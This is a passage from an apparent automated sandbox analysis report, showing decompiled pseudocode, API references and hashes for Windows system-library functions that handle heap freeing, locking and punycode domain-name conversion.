											} else {
												goto L31;
											}
											goto L62;
										} else {
											_t112 =  *(_t148 + 0x60) >> 2;
											 *(_t153 - 0x30) = _t112;
											_t134 =  *((intOrPtr*)(_t148 + 0x5c)) + _t148;
											 *((intOrPtr*)(_t153 - 0x34)) = _t134;
											while(1) {
												_t112 = _t112 - 1;
												 *(_t153 - 0x30) = _t112;
												if(_t112 < 0) {
													break;
												}
												_t85 =  *((intOrPtr*)(_t153 + 0xc)) -  *_t134;
												_t134 = _t134 + 4;
												 *((intOrPtr*)(_t153 - 0x34)) = _t134;
												if(_t85 != 0) {
													continue;
												}
												break;
											}
											if(_t112 < 0) {
												 *_t140 =  *_t140 | 0x00040000;
											}
											_t114 =  *(_t148 + 0x70) >> 2;
											 *(_t153 - 0x38) = _t114;
											_t136 =  *((intOrPtr*)(_t148 + 0x6c)) + _t148;
											 *((intOrPtr*)(_t153 - 0x3c)) = _t136;
											while(1) {
												_t114 = _t114 - 1;
												 *(_t153 - 0x38) = _t114;
												if(_t114 < 0) {
													break;
												}
												_t83 =  *((intOrPtr*)(_t153 + 0xc)) -  *_t136;
												_t136 = _t136 + 4;
												 *((intOrPtr*)(_t153 - 0x3c)) = _t136;
												if(_t83 != 0) {
													continue;
												}
												break;
											}
											if(_t114 < 0) {
												L31:
												 *_t140 =  *_t140 | 0x00020000;
											}
										}
										L27:
										 *((intOrPtr*)(_t153 - 4)) = 0xfffffffe;
										_t69 = 0;
									}
								}
								return E6ABBD0D1(_t69);
							} else {
								_t115 =  *((intOrPtr*)(_t67 + 4));
								if( *_t115 != _t67) {
									goto L15;
								} else {
									 *_t115 = _t120;
									 *((intOrPtr*)(_t120 + 4)) = _t115;
									_t141 =  *(_t146 + 0x50);
									_t99 =  *_t141;
									E6AB7FFB0(_t99, _t141, 0x6ac584d8);
									if( *((intOrPtr*)(_t146 + 0x3a)) != 0) {
										E6ABA37F5(_t146, 0);
									}
									E6ABA0413(_t146);
									_t90 =  *((intOrPtr*)(_t146 + 0x48));
									if(_t90 != 0) {
										if(_t90 != 0xffffffff) {
											E6AB99B10(_t90);
										}
									}
									if( *((intOrPtr*)(_t146 + 0x28)) != 0) {
										E6AB902D6(_t146 + 0x24);
									}
									_t65 = RtlFreeHeap( *0x6ac57b98, 0, _t146);
									if(_t99 != _t141) {
										goto L3;
									} else {
										_t118 = _t141;
										_pop(_t142);
										_pop(_t150);
										_t143 = _t118;
										_t91 =  *(_t143 + 8);
										if(_t91 != 0) {
											do {
												_t151 =  *_t91;
												RtlFreeHeap( *0x6ac57b98, 0, _t91);
												_t91 = _t151;
											} while (_t151 != 0);
										}
										return RtlFreeHeap( *0x6ac57b98, 0, _t143);
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				L62:
			}

0x6ab7ec81
0x6ab7ec83
0x6ab7ec85
0x6ab7ec86
0x6ab7ec8d
0x6ab7eca4
0x6ab7eca7
0x6ab7ec8f
0x6ab7ec8f
0x6ab7ec95
0x00000000
0x6ab7ec97
0x6ab7ec97
0x6ab7ec9a
0x6ab7eca2
0x6ab7ecad
0x6ab7ecb2
0x6ab7ecb5
0x6ab7ecba
0x6ab7ed2f
0x6ab7ed2f
0x6ab7ed32
0x6ab7ed34
0x6ab7ed35
0x6ab7ed36
0x6ab7ed37
0x6ab7ed38
0x6ab7ed39
0x6ab7ed3a
0x6ab7ed3b
0x6ab7ed3c
0x6ab7ed3d
0x6ab7ed3e
0x6ab7ed3f
0x6ab7ed40
0x6ab7ed42
0x6ab7ed47
0x6ab7ed4e
0x6ab7ed53
0x6abcbaf2
0x6abcbaf2
0x6ab7ed59
0x6ab7ed59
0x6ab7ed5e
0x00000000
0x6ab7ed64
0x6ab7ed64
0x6ab7ed6f
0x6ab7edf1
0x6ab7edf3
0x6ab7edf9
0x6ab7edfb
0x6ab7ee00
0x6ab7ee28
0x6ab7ee2b
0x00000000
0x6ab7ee31
0x6ab7ee33
0x6ab7ee35
0x00000000
0x00000000
0x6ab7ee35
0x6ab7ee02
0x6ab7ee02
0x6ab7ee09
0x6abcbaae
0x6abcbaae
0x6ab7ee0f
0x6ab7ee13
0x6ab7ee1a
0x6ab7ee1f
0x6ab7eea9
0x6ab7eeab
0x6ab7eeae
0x6ab7eeb1
0x6ab7eeb1
0x6ab7eeb4
0x6ab7eeb7
0x6ab7eec1
0x6ab7eec4
0x6ab7eec7
0x6ab7eecd
0x6ab7eecf
0x00000000
0x6ab7ee25
0x6ab7ee25
0x00000000
0x6ab7ee25
0x6ab7ee1f
0x00000000
0x6ab7ee09
0x00000000
0x6ab7ee02
0x6ab7ee3b
0x6ab7ee3d
0x6abcbab5
0x6abcbab5
0x6ab7ee46
0x6ab7ee48
0x6ab7ee4e
0x6ab7ee50
0x6ab7ee59
0x6abcbac0
0x6abcbac3
0x00000000
0x6abcbad1
0x6abcbad3
0x6abcbad3
0x6ab7ee5f
0x6ab7ee5f
0x6ab7ee6a
0x6ab7ede0
0x6ab7ede0
0x6ab7ee70
0x6ab7ee74
0x6ab7ee7b
0x6ab7ee80
0x6ab7eed7
0x00000000
0x6ab7ee82
0x6ab7ee82
0x6ab7ee84
0x6ab7ee84
0x6ab7ee87
0x6ab7ee87
0x6ab7ee8a
0x6ab7ee8d
0x6ab7ee96
0x6ab7ee96
0x6ab7ee99
0x6ab7ee9c
0x6ab7eea2
0x6ab7eea4
0x00000000
0x6ab7eea4
0x6ab7ee80
0x00000000
0x6ab7ee6a
0x00000000
0x6ab7ee5f
0x6ab7ede2
0x6ab7ede4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab7ed71
0x6ab7ed74
0x6ab7ed77
0x6ab7ed7d
0x6ab7ed7f
0x6ab7ed82
0x6ab7ed82
0x6ab7ed85
0x6ab7ed88
0x00000000
0x00000000
0x6ab7ed8d
0x6ab7ed8f
0x6ab7ed92
0x6ab7ed97
0x00000000
0x00000000
0x00000000
0x6ab7ed97
0x6ab7ed9b
0x6ab7ed9d
0x6ab7ed9d
0x6ab7eda6
0x6ab7eda9
0x6ab7edaf
0x6ab7edb1
0x6ab7edb4
0x6ab7edb4
0x6ab7edb7
0x6ab7edba
0x00000000
0x00000000
0x6ab7edbf
0x6ab7edc1
0x6ab7edc4
0x6ab7edc9
0x00000000
0x00000000
0x00000000
0x6ab7edc9
0x6ab7edcd
0x6ab7ede6
0x6ab7ede6
0x6ab7ede6
0x6ab7edcd
0x6ab7edcf
0x6ab7edcf
0x6ab7edd6
0x6ab7edd6
0x6ab7ed5e
0x6ab7eddd
0x6ab7ecbc
0x6ab7ecbc
0x6ab7ecc1
0x00000000
0x6ab7ecc3
0x6ab7ecc3
0x6ab7ecc5
0x6ab7ecc8
0x6ab7ecd0
0x6ab7ecd2
0x6ab7ecdd
0x6ab7ed1b
0x6ab7ed1b
0x6ab7ece1
0x6ab7ece6
0x6ab7eceb
0x6ab7ed25
0x6ab7ed28
0x6ab7ed28
0x6ab7ed25
0x6ab7ecf1
0x6ab7ecf6
0x6ab7ecf6
0x6ab7ed04
0x6ab7ed0b
0x00000000
0x6ab7ed0d
0x6ab7ed0d
0x6ab7ed0f
0x6ab7ed10
0x6ab9c27a
0x6ab9c27c
0x6ab9c281
0x6abda692
0x6abda692
0x6abda69d
0x6abda6a2
0x6abda6a4
0x6abda6a8
0x6ab9c292
0x6ab9c292
0x6ab7ed0b
0x6ab7ecc1
0x00000000
0x00000000
0x00000000
0x6ab7eca2
0x6ab7ec95
0x00000000

APIs

RtlAcquireSRWLockExclusive.1105(6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB7ECAD
RtlReleaseSRWLockExclusive.1105(6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB7ECD2
RtlFreeHeap.1105(00000000,?,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB7ED04
RtlReleaseActivationContext.1105(-00000F38,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB7ED28
_wcsicmp.1105(6AC3FE98,?,6AC3FB78,00000030,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB7EE13
_wcsicmp.1105(6AC3FE98,?,6AC3FB78,00000030,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB7EE74
RtlFreeHeap.1105(00000000,?,6ABB17F0,6AB8F715,6AB8F5C0,?,?,?,00000001,-00000F38), ref: 6AB9C28C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveFreeHeapLockRelease_wcsicmp$AcquireActivationContext
String ID:
API String ID: 176173115-0
Opcode ID: c06b239375f4a047a8e57e75760f0575b4890edc9c58ca806f5cb884221dc0d1
Instruction ID: 747c3aeb9ec4063f01c7f7df64960e8b12e914d5bae5c9184537bbf5633a3a42
Opcode Fuzzy Hash: c06b239375f4a047a8e57e75760f0575b4890edc9c58ca806f5cb884221dc0d1
Instruction Fuzzy Hash: 9781F430A042859FCB24CF6DC850ADDB7B2FF86718F11852DE565AB290EFB0E851EB40

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7F820, Relevance: 12.1, APIs: 8, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6AB7F820(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20) {
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* _t37;
				signed int _t55;
				signed int _t56;
				signed int* _t62;
				signed int _t64;
				signed int* _t72;
				signed int _t76;
				void* _t78;
				signed int _t80;
				void* _t82;
				void* _t83;

				_t82 = (_t80 & 0xfffffff8) - 0x14;
				_t74 = _a4;
				if(_a4 == 0) {
					L22:
					_t78 = 0x57;
					goto L16;
				} else {
					_t62 = _a20;
					if(_t62 == 0) {
						goto L22;
					} else {
						_t37 = E6ABAF380(_t74, 0x6ab45138, 0x10);
						_t83 = _t82 + 0xc;
						if(_t37 == 0) {
							if( *0x6ac560d8 == 0) {
								goto L3;
							} else {
								_push(0x57);
								goto L25;
							}
						} else {
							L3:
							_t71 = _a12;
							 *_t62 =  *_t62 & 0x00000000;
							_t78 = 0;
							_t62[1] = _t62[1] & 0x00000000;
							_t76 = E6AB9BC2C(_t74, _a12, _a16, _a8);
							if(_t76 == 0) {
								_push("true");
								L25:
								_pop(_t78);
								goto L23;
							} else {
								_t8 = _t76 + 0x24; // 0x24
								_t63 = _t8;
								E6AB82280(_t38, _t8);
								 *(_t76 + 0x2c) =  *( *[fs:0x18] + 0x24);
								if(_a8 == 0xa) {
									L6:
									_t14 = _t76 + 0xc; // 0xc
									 *((intOrPtr*)(_t83 + 0x18)) = _t14;
									 *((short*)(_t83 + 0x20)) =  *(_t76 + 0x34);
									E6AB82280( *(_t76 + 0x34), 0x6ac586ac);
									_t64 =  *0x6ac586dc;
									_v20 =  *0x6ac586e0 & 1;
									_v24 = 0;
									if(_t64 != 0) {
										L7:
										while(1) {
											if(E6AB7F99D(_t83 + 0x1c, _t64) >= 0) {
												_t55 =  *(_t64 + 4);
												if(_v16 != 0) {
													if(_t55 == 0) {
														goto L13;
													} else {
														_t55 = _t55 ^ _t64;
														goto L12;
													}
													goto L17;
												} else {
													L12:
													if(_t55 != 0) {
														goto L10;
													} else {
														L13:
														_v20 = 1;
													}
												}
											} else {
												_t56 =  *_t64;
												if(_v16 != 0) {
													if(_t56 == 0) {
														goto L14;
													} else {
														_t55 = _t56 ^ _t64;
														goto L9;
													}
													goto L17;
												} else {
													L9:
													if(_t55 == 0) {
														L14:
														_v20 = 0;
													} else {
														L10:
														_t64 = _t55;
														continue;
													}
												}
											}
											goto L15;
										}
									}
									L15:
									E6AB7B090(0x6ac586dc, _t64, _v20, _t76);
									E6AB7FFB0(_t64, _t76, 0x6ac586ac);
									E6AB9F296(_t76, _t71);
									 *(_t76 + 0x2c) =  *(_t76 + 0x2c) & 0x00000000;
									_t29 = _t76 + 0x24; // 0x24
									E6AB7FFB0(_t64, _t76, _t29);
									asm("cdq");
									_t72 = _a20;
									 *_t72 = _t76;
									_t72[1] =  *(_t76 + 0x34) & 0x0000ffff;
								} else {
									_t71 = _a12;
									_t78 = E6AB94D3B(_t76, _a12, _a8);
									if(_t78 != 0) {
										 *(_t76 + 0x2c) =  *(_t76 + 0x2c) & 0x00000000;
										E6AB7FFB0(_t63, _t76, _t63);
										E6AB6F871(_t63);
									} else {
										goto L6;
									}
								}
								L16:
								if(_t78 != 0) {
									L23:
									E6AB6CC50(_t78);
								}
							}
						}
					}
				}
				L17:
				return _t78;
			}

0x6ab7f828
0x6ab7f82e
0x6ab7f833
0x6ab7f990
0x6ab7f992
0x00000000
0x6ab7f839
0x6ab7f839
0x6ab7f83e
0x00000000
0x6ab7f844
0x6ab7f84c
0x6ab7f851
0x6ab7f856
0x6ab7f97b
0x00000000
0x6ab7f981
0x6ab7f981
0x00000000
0x6ab7f981
0x6ab7f85c
0x6ab7f85c
0x6ab7f85f
0x6ab7f867
0x6ab7f86a
0x6ab7f86c
0x6ab7f875
0x6ab7f879
0x6abcbd6b
0x6abcbd6d
0x6abcbd6d
0x00000000
0x6ab7f87f
0x6ab7f87f
0x6ab7f87f
0x6ab7f883
0x6ab7f895
0x6ab7f898
0x6ab7f8b1
0x6ab7f8b1
0x6ab7f8b4
0x6ab7f8c1
0x6ab7f8c6
0x6ab7f8d2
0x6ab7f8db
0x6ab7f8df
0x6ab7f8e6
0x00000000
0x6ab7f8e8
0x6ab7f8f5
0x6ab7f911
0x6ab7f914
0x6ab7f98a
0x00000000
0x6ab7f98c
0x6ab7f98c
0x00000000
0x6ab7f98c
0x00000000
0x6ab7f916
0x6ab7f916
0x6ab7f918
0x00000000
0x6ab7f91a
0x6ab7f91a
0x6ab7f91a
0x6ab7f91a
0x6ab7f918
0x6ab7f8f7
0x6ab7f8fc
0x6ab7f8fe
0x6abcbd8b
0x00000000
0x6abcbd91
0x6abcbd91
0x00000000
0x6abcbd91
0x00000000
0x6ab7f904
0x6ab7f904
0x6ab7f906
0x6ab7f921
0x6ab7f921
0x6ab7f908
0x6ab7f908
0x6ab7f908
0x00000000
0x6ab7f908
0x6ab7f906
0x6ab7f8fe
0x00000000
0x6ab7f8f5
0x6ab7f8e8
0x6ab7f926
0x6ab7f931
0x6ab7f93b
0x6ab7f942
0x6ab7f947
0x6ab7f94b
0x6ab7f94f
0x6ab7f95a
0x6ab7f95d
0x6ab7f960
0x6ab7f962
0x6ab7f89a
0x6ab7f89d
0x6ab7f8a7
0x6ab7f8ab
0x6abcbd73
0x6abcbd78
0x6abcbd7f
0x00000000
0x00000000
0x00000000
0x6ab7f8ab
0x6ab7f965
0x6ab7f967
0x6ab7f995
0x6ab7f996
0x6ab7f996
0x6ab7f967
0x6ab7f879
0x6ab7f856
0x6ab7f83e
0x6ab7f969
0x6ab7f971

APIs

memcmp.1105(?,6AB45138,00000010,?,00000000,00000000,6AB4C318), ref: 6AB7F84C
RtlAcquireSRWLockExclusive.1105(00000024,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB7F883
RtlAcquireSRWLockExclusive.1105(6AC586AC,00000024,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB7F8C6

Part of subcall function 6AB94D3B: memset.1105(?,00000000,000000A0,00000000,00000000,00000024), ref: 6AB94D77
Part of subcall function 6AB94D3B: RtlRunOnceExecuteOnce.1105(6AC586B0,6AB95690,00000000,00000000,00000000,00000000,00000024), ref: 6AB94D9E
Part of subcall function 6AB94D3B: ZwTraceControl.1105(0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6AB94DE9
Part of subcall function 6AB94D3B: memcmp.1105(?,6AB45138,00000010,0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6AB94E26

RtlRbInsertNodeEx.1105(6AC586DC,?,00000000,00000000), ref: 6AB7F931
RtlReleaseSRWLockExclusive.1105(6AC586AC,6AC586DC,?,00000000,00000000), ref: 6AB7F93B
RtlReleaseSRWLockExclusive.1105(00000024,6AC586AC,6AC586DC,?,00000000,00000000), ref: 6AB7F94F

Part of subcall function 6AB9BC2C: RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000,6AB7F875,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB9BC79
Part of subcall function 6AB9BC2C: RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,00000000,6AB7F875,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB9BC8D
Part of subcall function 6AB9BC2C: RtlAllocateHeap.1105(?,00000008,000000D0,?,?,?,00000000,00000000,6AB7F875,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB9BCA6

RtlSetLastWin32Error.1105(00000057,?,00000000,00000000,6AB4C318), ref: 6AB7F996
RtlReleaseSRWLockExclusive.1105(00000024,0000000A,00000024,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6ABCBD78

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$Acquire$Oncememcmp$AllocateControlErrorExecuteHeapInsertLastNodeTraceWin32memset
String ID:
API String ID: 3014906823-0
Opcode ID: feb087ac642684403588475b2d7ea2220983d6f08c522ccb5c08701c245a468b
Instruction ID: 66f4bc2f6b5f579f0ca7ec615efbf8e0e5c0dc4c0f7a43b9a13a26da3347e074
Opcode Fuzzy Hash: feb087ac642684403588475b2d7ea2220983d6f08c522ccb5c08701c245a468b
Instruction Fuzzy Hash: 8541E171205386BBDB21CF38C844B5FB7E4EF85358F014529E8269A242DFB0D414EBAA

Uniqueness

Uniqueness Score: -1.00%

Function 6AB65C07, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 452
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6AB65C07(signed short* __ecx, signed int __edx, signed int* _a4, signed int* _a8, char _a12, char _a16, char* _a20, intOrPtr* _a24) {
				signed short* _v8;
				intOrPtr _v12;
				signed int* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int* _v44;
				signed int _v48;
				signed short* _v52;
				signed short* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int* _v76;
				void* _t155;
				signed int* _t156;
				intOrPtr* _t159;
				char _t160;
				signed int _t179;
				signed int _t181;
				char* _t182;
				void* _t183;
				signed int _t186;
				void* _t187;
				signed int _t190;
				signed int _t196;
				signed int* _t198;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t203;
				signed int _t215;
				intOrPtr _t221;
				signed int _t222;
				signed int _t225;
				void* _t227;
				void* _t228;
				signed int* _t233;
				intOrPtr* _t234;
				signed int* _t236;
				signed short* _t239;
				void* _t249;
				void* _t250;
				signed int _t251;
				signed int _t253;
				void* _t269;
				signed int _t270;
				signed int _t272;
				void* _t273;
				void* _t274;
				signed short* _t277;
				signed short* _t280;
				intOrPtr* _t281;
				intOrPtr* _t282;
				signed int _t284;
				signed int _t287;
				signed int* _t288;
				signed int _t293;
				signed int* _t295;
				signed int* _t297;
				signed int _t299;
				signed int* _t302;
				signed int _t306;
				signed int _t309;
				signed int _t314;
				signed int _t315;
				signed short* _t317;
				void* _t318;

				_t236 = _a8;
				_v72 = __edx;
				_v52 = __ecx;
				_t299 =  *_t236;
				 *_t236 =  *_t236 & 0x00000000;
				 *_a20 = 1;
				if(__edx <= 0) {
					_t155 = 0xc0000716;
					L34:
					return _t155;
				}
				_t277 =  &(__ecx[__edx]);
				_t238 = __ecx;
				_v8 = __ecx;
				_v56 =  &(__ecx[0xffffffffffffffff]);
				_t295 = _a4;
				_t156 = _t295;
				_v16 = _t156;
				_t233 = _t156;
				_v76 = _t233;
				_v12 = _t233 + _t299 * 2;
				 *_a24 = _t233 - 2;
				if(__ecx >= _t277) {
					L35:
					_t155 = 0xc0000716;
					L33:
					goto L34;
				}
				_t302 = _t233;
				_v60 = 0x80;
				while(1) {
					_t159 = E6AB65DDE(_t238, _t277, _a12);
					_t239 = _v8;
					_t234 = _t159;
					if(_t234 == _t239) {
						break;
					}
					if(_a12 != 0) {
						_t306 = _t234 - _t239;
						L7:
						if((_t277 - _t239 & 0xfffffffe) < 8) {
							L11:
							if((_v12 - _t295 & 0xfffffffe) < (_t306 & 0xfffffffe)) {
								goto L35;
							}
							_t280 = _t239;
							if(_t239 >= _t234) {
								L21:
								if(_a12 != 0 || (_t234 - _t239 & 0xfffffffe) <= 0x7e && _t295 != _v16) {
									_t277 = _v52 + _v72 * 2;
									if(_t234 == _t277) {
										L27:
										_t160 = _a12;
										if(_t160 != 0) {
											_a12 = 0;
											_v56 = _t234;
											asm("sbb ecx, ecx");
											 *_a24 = _t295 - ( ~(_t234 - _t277) & 0x00000002);
											if(_t234 == _t277 - 2) {
												goto L35;
											}
											_t160 = _a12;
										}
										_t238 = _t234 + 2;
										_t302 = _t295;
										_v8 = _t234 + 2;
										_v16 = _t302;
										if(_t234 < _t277) {
											continue;
										}
										L29:
										_t297 = _v76;
										if(_t302 == _t297 || _t160 == 0 && _t277 - _v56 >> 1 > (0 | ( *(_t277 - 2) & 0x0000ffff) == 0x0000002e) + 0xff) {
											goto L35;
										} else {
											 *_a8 = _t302 - _t297 >> 1;
											_t155 = 0;
											goto L33;
										}
									}
									if(_t295 >= _v12) {
										goto L35;
									}
									 *_t295 =  *_t234;
									_t295 =  &(_t295[0]);
									_a4 = _t295;
									goto L27;
								} else {
									goto L35;
								}
							} else {
								goto L13;
							}
							do {
								L13:
								if(_a12 != 0) {
									L17:
									_t179 =  *_t280 & 0x0000ffff;
									if(_t179 == 0 || _t179 >= 0x80) {
										goto L35;
									} else {
										goto L19;
									}
								}
								if(_a16 != 0) {
									if(E6AC17F9F( *_t280) == 0) {
										goto L35;
									}
								}
								_t181 =  *_t280 & 0x0000ffff;
								_t249 = 0x20;
								if(_t181 < _t249) {
									goto L35;
								}
								_t250 = 0x7f;
								if(_t181 == _t250) {
									goto L35;
								}
								goto L17;
								L19:
								 *_t295 = _t179;
								_t280 =  &(_t280[1]);
								_t295 =  &(_t295[0]);
								_a4 = _t295;
							} while (_t280 < _t234);
							L20:
							_t239 = _v8;
							goto L21;
						}
						_t182 = L"xl--";
						if(_a12 == 0) {
							_t182 = L"xn--";
						}
						_t183 = E6ABAE5C0(_t239, _t182, 4);
						_t239 = _v8;
						_t318 = _t318 + 0xc;
						if(_t183 == 0) {
							_t281 = _t234 - 2;
							_t239 =  &(_t239[4]);
							_v8 = _t239;
							 *_a20 = 0;
							if(_t281 < _t239) {
								L46:
								_t281 = 0;
								L47:
								if(_t281 == _t234 - 2) {
									goto L35;
								}
								if(_t281 == 0 || _t281 <= _t239) {
									_t186 = 0;
								} else {
									_t317 = _t239;
									_t186 = _t281 - _t239 >> 1;
									_v48 = _t186;
									if(_t239 == _t281) {
										L68:
										if(_t186 <= 0) {
											_t187 = 0;
										} else {
											_t187 = 2 + _t186 * 2;
										}
										_t309 = 0;
										_v24 = 0x80;
										_v28 = _v28 & 0;
										_t282 = _t187 + _t239;
										_v36 = _t282;
										_v48 = 0x48;
										if(_t282 >= _t234) {
											goto L21;
										} else {
											do {
												_t251 = 0x24;
												_v68 = _t309;
												_v64 = _t309;
												_v20 = 1;
												_v40 = _t251;
												_v44 = _t251 - _v48;
												while(_t282 < _t234) {
													_t190 = E6AC1802C( *_t282);
													_v36 = _v36 + 2;
													_t253 = _t190;
													if(_t253 < 0) {
														goto L35;
													}
													asm("cdq");
													if(_t253 > 0x7ffffff / _v20) {
														goto L35;
													}
													_t284 = _v40;
													_t309 = _t309 + _t253 * _v20;
													_t196 = _v48;
													_v32 = _t309;
													if(_t284 > _t196) {
														if(_t284 < _t196 + 0x1a) {
															_t198 = _v44;
														} else {
															_t198 = 0x1a;
														}
													} else {
														_t198 = 1;
													}
													if(_t253 < _t198) {
														_t314 = (_t295 - _v16 >> 1) - _v28 + 1;
														_v48 = E6AC17FD5(_v32 - _v68, _t314, (_t253 & 0xffffff00 | _v64 == 0x00000000) & 0x000000ff);
														_t200 = _v32;
														asm("cdq");
														_t315 = _t200 % _t314;
														_t287 = _t200 / _t314;
														_t202 = _v24;
														_v32 = _t315;
														if(_t287 > 0x7ffffff - _t202) {
															goto L35;
														}
														_t203 = _t202 + _t287;
														_v24 = _t203;
														if(_t203 >= 0x80 && _t203 <= 0x10ffff && (_t203 < 0xd800 || _t203 > 0xdfff)) {
															if(_v28 <= 0) {
																_t288 = _v16 + _t315 * 2;
																_v44 = _t288;
																L97:
																if(_t203 >= 0x10000) {
																	if(_t295 >= _v12 + 0xfffffffe || _t288 > _t295) {
																		goto L35;
																	} else {
																		asm("cdq");
																		_t140 = (_v24 + 0xffff0000) / 0x400 - 0x2800; // -4294911872
																		E6AC17F11((_v24 + 0xffff0000) / 0x400, _t140, _v44,  &_a4);
																		E6AC17F11( &_a4, (_v24 + 0xffff0000) % 0x400 - 0x2400,  &(_v44[0]),  &_a4);
																		_v28 = _v28 + 1;
																		_t315 = _v32;
																		goto L104;
																	}
																}
																if(_t295 >= _v12 || _t288 > _t295) {
																	goto L35;
																} else {
																	E6AC17F11(_t203, _t203, _t288,  &_a4);
																	goto L104;
																}
															}
															_t288 = _v16;
															_v40 = _t315;
															_v44 = _t288;
															if(_t315 <= 0) {
																goto L97;
															}
															while(_t288 < _t295) {
																if(E6AC17F61( *_t288) != 0) {
																	_t288 =  &(_t288[0]);
																}
																_t288 =  &(_t288[0]);
																_t215 = _v40 - 1;
																_v44 = _t288;
																_v40 = _t215;
																if(_t215 > 0) {
																	continue;
																} else {
																	_t203 = _v24;
																	goto L97;
																}
															}
														}
														goto L35;
													} else {
														_t269 = 0x24;
														_t270 = _t269 - _t198;
														asm("cdq");
														_t293 = _v20;
														if(_t293 > 0x7ffffff / _t270) {
															goto L35;
														}
														_v40 = _v40 + 0x24;
														_v44 =  &(_v44[9]);
														_t282 = _v36;
														_v20 = _t270 * _t293;
														continue;
													}
												}
												goto L35;
												L104:
												_t282 = _v36;
												_t309 = _t315 + 1;
												_t295 = _a4;
											} while (_t282 < _t234);
											goto L20;
										}
									}
									while(_t295 < _v12) {
										_t221 = _a12;
										if(_t221 != 0) {
											L58:
											_t272 =  *_t317 & 0x0000ffff;
											if(_t272 == 0 || _t272 >= _v60) {
												goto L35;
											} else {
												if(_t221 != 0) {
													L63:
													_t222 = _t272;
													L64:
													 *_t295 = _t222;
													_t317 =  &(_t317[1]);
													_t295 =  &(_t295[0]);
													_a4 = _t295;
													if(_t317 != _t281) {
														continue;
													}
													break;
												}
												_t59 = _t272 - 0x41; // 0x3f
												if(_t59 > 0x19) {
													goto L63;
												}
												_t60 = _t272 + 0x20; // 0xa0
												_t222 = _t60 & 0x0000ffff;
												goto L64;
											}
										}
										if(_a16 == _t221 || E6AC17F9F( *_t317) != 0) {
											_t225 =  *_t317 & 0x0000ffff;
											_t273 = 0x20;
											if(_t225 < _t273) {
												goto L35;
											}
											_t274 = 0x7f;
											if(_t225 == _t274) {
												goto L35;
											}
											_t221 = _a12;
											goto L58;
										} else {
											goto L35;
										}
									}
									if(_t317 != _t281) {
										goto L35;
									}
									_t239 = _v8;
									_t186 = _v48;
								}
								goto L68;
							}
							_t227 = 0x2d;
							while( *_t281 != _t227) {
								_t281 = _t281 - 2;
								if(_t281 >= _t239) {
									continue;
								}
								goto L46;
							}
							goto L47;
						} else {
							goto L11;
						}
					}
					if(_a16 != 0) {
						_t228 = 0x2d;
						if( *_t239 == _t228) {
							goto L35;
						}
						if(_t234 <= _v52) {
							goto L6;
						}
						if( *((intOrPtr*)(_t234 - 2)) == _t228) {
							goto L35;
						}
					}
					L6:
					_t306 = _t234 - _t239;
					if((_t306 & 0xfffffffe) > 0x7e) {
						goto L35;
					}
					goto L7;
				}
				_t160 = _a12;
				if(_t160 != 0 || _t234 != _t277) {
					goto L35;
				} else {
					goto L29;
				}
			}

0x6ab65c14
0x6ab65c18
0x6ab65c1b
0x6ab65c1e
0x6ab65c20
0x6ab65c26
0x6ab65c2b
0x6abc12f0
0x6ab65dcf
0x6ab65dd4
0x6ab65dd4
0x6ab65c31
0x6ab65c34
0x6ab65c39
0x6ab65c3c
0x6ab65c40
0x6ab65c43
0x6ab65c45
0x6ab65c48
0x6ab65c4a
0x6ab65c53
0x6ab65c59
0x6ab65c5d
0x6ab65dd7
0x6ab65dd7
0x6ab65dce
0x00000000
0x6ab65dce
0x6ab65c63
0x6ab65c65
0x6ab65c6c
0x6ab65c6f
0x6ab65c74
0x6ab65c77
0x6ab65c7b
